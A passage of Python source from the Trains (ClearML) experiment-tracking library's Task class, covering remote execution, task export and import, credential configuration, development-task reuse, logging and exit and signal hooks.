j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get the Task parameters as a raw nested dictionary.
.. note::
The values are not parsed. They are returned as is.
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set the parameters for the Task object from a dictionary. The dictionary can be nested.
This does not link the dictionary to the Task object. It does a one-time update. This
is the same behavior as the :meth:`Task.connect` method.
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
def execute_remotely(self, queue_name=None, clone=False, exit_process=True):
# type: (Optional[str], bool, bool) -> ()
"""
If task is running locally (i.e., not by ``trains-agent``), then clone the Task and enqueue it for remote
execution; or, stop the execution of the current Task, reset its state, and enqueue it. If ``exit==True``,
*exit* this process.
.. note::
If the task is running remotely (i.e., ``trains-agent`` is executing it), this call is a no-op
(i.e., does nothing).
:param queue_name: The queue name used for enqueueing the task. If ``None``, this call exits the process
without enqueuing the task.
:param clone: Clone the Task and execute the newly cloned Task?
The values are:
- ``True`` - A cloned copy of the Task will be created, and enqueued, instead of this Task.
- ``False`` - The Task will be enqueued.
:param exit_process: The function call will leave the calling process at the end?
- ``True`` - Exit the process (exit(0)).
- ``False`` - Do not exit the process.
.. warning::
If ``clone==False``, then ``exit_process`` must be ``True``.
"""
# do nothing, we are running remotely
if running_remotely():
return
if not clone and not exit_process:
raise ValueError(
"clone==False and exit_process==False is not supported. "
"Task enqueuing itself must exit the process afterwards.")
# make sure we analyze the process
if self.status in (Task.TaskStatusEnum.in_progress, ):
if clone:
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
self.flush(wait_for_uploads=True)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
else:
# close ourselves (it will make sure the repo is updated)
self.close()
# clone / reset Task
if clone:
task = Task.clone(self)
else:
task = self
self.reset()
# enqueue ourselves
if queue_name:
Task.enqueue(task, queue_name=queue_name)
LoggerRoot.get_base_logger().warning(
'Switching to remote execution, output log page {}'.format(task.get_output_log_web_page()))
# leave this process.
if exit_process:
LoggerRoot.get_base_logger().warning('Terminating local execution process')
exit(0)
return
def wait_for_status(
self,
status=(_Task.TaskStatusEnum.completed, _Task.TaskStatusEnum.stopped, _Task.TaskStatusEnum.closed),
raise_on_status=(tasks.TaskStatusEnum.failed,),
check_interval_sec=60.,
):
# type: (Iterable[Task.TaskStatusEnum], Optional[Iterable[Task.TaskStatusEnum]], float) -> ()
"""
Wait for a task to reach a defined status.
:param status: Status to wait for. Defaults to ('completed', 'stopped', 'closed', )
:param raise_on_status: Raise RuntimeError if the status of the tasks matches one of these values.
Defaults to ('failed').
:param check_interval_sec: Interval in seconds between two checks. Defaults to 60 seconds.
:raise: RuntimeError if the status is one of {raise_on_status}.
"""
stopped_status = list(status) + (list(raise_on_status) if raise_on_status else [])
while self.status not in stopped_status:
time.sleep(check_interval_sec)
if raise_on_status and self.status in raise_on_status:
raise RuntimeError("Task {} has status: {}.".format(self.task_id, self.status))
def export_task(self):
# type: () -> dict
"""
Export Task's configuration into a dictionary (for serialization purposes).
A Task can be copied/modified by calling Task.import_task()
Notice: Export task does not include the tasks outputs, such as results
(scalar/plots etc.) or Task artifacts/models
:return: dictionary of the Task's configuration.
"""
self.reload()
export_data = self.data.to_dict()
export_data.pop('last_metrics', None)
export_data.pop('last_iteration', None)
export_data.pop('status_changed', None)
export_data.pop('status_reason', None)
export_data.pop('status_message', None)
export_data.get('execution', {}).pop('artifacts', None)
export_data.get('execution', {}).pop('model', None)
export_data['project_name'] = self.get_project_name()
return export_data
def update_task(self, task_data):
# type: (dict) -> bool
"""
Update current task with configuration found on the task_data dictionary.
See also export_task() for retrieving Task configuration.
:param task_data: dictionary with full Task configuration
:return: return True if Task update was successful
"""
return self.import_task(task_data=task_data, target_task=self, update=True)
@classmethod
def import_task(cls, task_data, target_task=None, update=False):
# type: (dict, Optional[Union[str, Task]], bool) -> bool
"""
Import (create) Task from previously exported Task configuration (see Task.export_task)
Can also be used to edit/update an existing Task (by passing `target_task` and `update=True`).
:param task_data: dictionary of a Task's configuration
:param target_task: Import task_data into an existing Task. Can be either task_id (str) or Task object.
:param update: If True, merge task_data with current Task configuration.
:return: return True if Task was imported/updated
"""
if not target_task:
project_name = task_data.get('project_name') or Task._get_project_name(task_data.get('project', ''))
target_task = Task.create(project_name=project_name, task_name=task_data.get('name', None))
elif isinstance(target_task, six.string_types):
target_task = Task.get_task(task_id=target_task)
elif not isinstance(target_task, Task):
raise ValueError(
"`target_task` must be either Task id (str) or Task object, "
"received `target_task` type {}".format(type(target_task)))
target_task.reload()
cur_data = target_task.data.to_dict()
cur_data = merge_dicts(cur_data, task_data) if update else task_data
cur_data.pop('id', None)
cur_data.pop('project', None)
# noinspection PyProtectedMember
valid_fields = list(tasks.EditRequest._get_data_props().keys())
cur_data = dict((k, cur_data[k]) for k in valid_fields if k in cur_data)
res = target_task._edit(**cur_data)
if res and res.ok():
target_task.reload()
return True
return False
@classmethod
def set_credentials(cls, api_host=None, web_host=None, files_host=None, key=None, secret=None, host=None):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> ()
"""
Set new default **Trains Server** (backend) host and credentials.
These credentials will be overridden by either OS environment variables, or the Trains configuration
file, ``trains.conf``.
.. warning::
Credentials must be set before initializing a Task object.
For example, to set credentials for a remote computer:
.. code-block:: py
Task.set_credentials(api_host='http://localhost:8008', web_host='http://localhost:8080',
files_host='http://localhost:8081', key='optional_credentials', secret='optional_credentials')
task = Task.init('project name', 'experiment name')
:param str api_host: The API server url. For example, ``host='http://localhost:8008'``
:param str web_host: The Web server url. For example, ``host='http://localhost:8080'``
:param str files_host: The file server url. For example, ``host='http://localhost:8081'``
:param str key: The user key (in the key/secret pair). For example, ``key='thisisakey123'``
:param str secret: The user secret (in the key/secret pair). For example, ``secret='thisisseceret123'``
:param str host: The host URL (overrides api_host). For example, ``host='http://localhost:8008'``
"""
if api_host:
Session.default_host = api_host
if web_host:
Session.default_web = web_host
if files_host:
Session.default_files = files_host
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if host:
Session.default_host = host
Session.default_web = web_host or ''
Session.default_files = files_host or ''
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# noinspection PyProtectedMember
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: The model config_text (unconstrained text string).
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary.
"""
config_text = self._get_model_config_text()
# noinspection PyProtectedMember
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(
cls, default_project_name, default_task_name, default_task_type,
reuse_last_task_id, continue_last_task=False, detect_repo=True,
):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# conform reuse_last_task_id and continue_last_task
if continue_last_task and isinstance(continue_last_task, str):
reuse_last_task_id = continue_last_task
continue_last_task = True
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id or isinstance(reuse_last_task_id, str):
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
task = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
# instead of resting the previously used task we are continuing the training with it.
if task and continue_last_task:
task.reload()
task.mark_started(force=True)
task.set_initial_iteration(task.get_last_iteration()+1)
else:
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task._status) in (
str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_model_id or (ARCHIVED_TAG in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
with task._edit_lock:
# from now on, there is no need to reload, we just clear stuff,
# this flag will be cleared off once we actually refresh at the end of the function
task._reload_skip_flag = True
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# clear the heaviest stuff first
task._clear_task(
system_tags=[cls._development_tag],
comment=make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
# no need to reload yet, we clear this before the end of the function
task._reload_skip_flag = True
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark us as the main Task, there should only be one dev Task at a time.
if not Task.__main_task:
Task.__main_task = task
# mark the task as started
task.started()
# reload, making sure we are synced
task._reload_skip_flag = False
task.reload()
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.report_text('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id and not continue_last_task:
logger.report_text('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
elif default_task_id and continue_last_task:
logger.report_text('TRAINS Task: continuing previous task id=%s '
'Notice this run will not be reproducible!' % task.id)
else:
logger.report_text('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
# noinspection PyBroadException
try:
import traceback
stack = traceback.extract_stack(limit=10)
# NOTICE WE ARE ALWAYS 3 down from caller in stack!
for i in range(len(stack)-1, 0, -1):
# look for the Task.init call, then the one above it is the callee module
if stack[i].name == 'init':
task._calling_filename = os.path.abspath(stack[i-1].filename)
break
except Exception:
pass
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet):
# type: (Optional[float]) -> Logger
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None of any other False value, will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# do not recreate logger after task was closed/quit
if self._at_exit_called:
raise ValueError("Cannot use Task Logger after task was closed")
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reported to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
return model
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, an then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.info('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
return model
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
# if we have a parser but nor parsed_args, we need to find the parser
if parser and not parsed_args:
for _parser, _parsed_args in get_argparser_last_args():
if _parser == parser:
parsed_args = _parsed_args
break
else:
# prefer the first argparser (hopefully it is more relevant?!
for _parser, _parsed_args in get_argparser_last_args():
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(
parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary):
def _update_args_dict(task, config_dict):
# noinspection PyProtectedMember
task._arguments.copy_from_dict(flatten_dictionary(config_dict))
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
# noinspection PyProtectedMember
a_flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict))
# noinspection PyProtectedMember
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, a_flat_dict))
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if not running_remotely() or not self.is_main_task():
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
return attr_class
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task() or self._at_exit_called:
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if not self._detect_repo_async_thread:
return
with self._repo_detect_lock:
if not self._detect_repo_async_thread:
return
# noinspection PyBroadException
try:
if self._detect_repo_async_thread.is_alive():
# if negative timeout, just kill the thread:
if timeout is not None and timeout < 0:
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
# done waiting, kill the thread
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
# protect sub-process at_exit (should never happen)
if self._at_exit_called:
return
# shutdown will clear the main, so we have to store it before.
# is_main = self.is_main_task()
self.__shutdown()
# In rare cases we might need to forcefully shutdown the process, currently we should avoid it.
# if is_main:
# # we have to forcefully shutdown if we have forked processes, sometimes they will get stuck
# os._exit(self.__exit_hook.exit_code if self.__exit_hook and self.__exit_hook.exit_code else 0)
def __shutdown(self):
"""
Will happen automatically once we exit code, i.e. atexit
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
return
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
wait_for_std_log = True
if not running_remotely() and self.is_main_task() and not is_sub_process:
# check if we crashed, ot the signal is not interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
is_exception = self.__exit_hook.exception
# check if we are running inside a debugger
if not is_exception and sys.modules.get('pydevd'):
# noinspection PyBroadException
try:
is_exception = sys.last_type
except Exception:
pass
if (is_exception and not isinstance(self.__exit_hook.exception, KeyboardInterrupt)) \
or (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not is_exception:
task_status = ('completed', )
else:
task_status = ('stopped', )
# user aborted. do not bother flushing the stdout logs
wait_for_std_log = self.__exit_hook.signal is not None
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# kill the repo thread (negative timeout, do not wait), if it hasn't finished yet.
self._wait_for_repo_detection(timeout=-1)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self._reporter and self.reporter.get_num_results() > 0)):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flush everything
if self._reporter:
self.reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
# noinspection PyBroadException
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except Exception:
pass
if print_done_waiting:
self.log.info('Finished uploading')
elif self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
self._dev_worker = None
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._resource_monitor = None
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
if self._logger:
self._logger.set_flush_period(None)
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=wait_for_uploads or wait_for_std_log)
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
# delete locking object (lock file)
if self._edit_lock:
# noinspection PyBroadException
try:
del self.__edit_lock
except Exception:
pass
self._edit_lock = None
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
# noinspection PyBroadException
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# un register int hook
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for h in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(h, self._org_handlers[h])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
# TODO: check if sub-process hooks are safe enough, for the time being allow it
if not self._org_handlers: # ## and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for c in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[c] = signal.getsignal(c)
signal.signal(c, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
# noinspection PyArgumentList
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
# noinspection PyArgumentList
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
# noinspection PyNoneFunctionAssignment, PyArgumentList
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id] if project else None,
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags]
)
)
res_tasks = res.response.tasks
# if we have more than one result, first filter 'archived' results:
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
'archived' not in getattr(t, system_tags, None)]
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(entity='task', query=task_name, results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
for task_id in task_ids]
return [cls(private=cls.__create_protection, task_id=task.id, log_to_backend=False)
for task in cls._query_tasks(project_name=project_name, task_name=task_name, **kwargs)]
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
id=task_ids,
project=[project.id] if project else kwargs.pop('project', None),
name=task_name if task_name else None,
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may not exist in environment changes
if not all_tasks:
return None
return all_tasks[0]
@classmethod
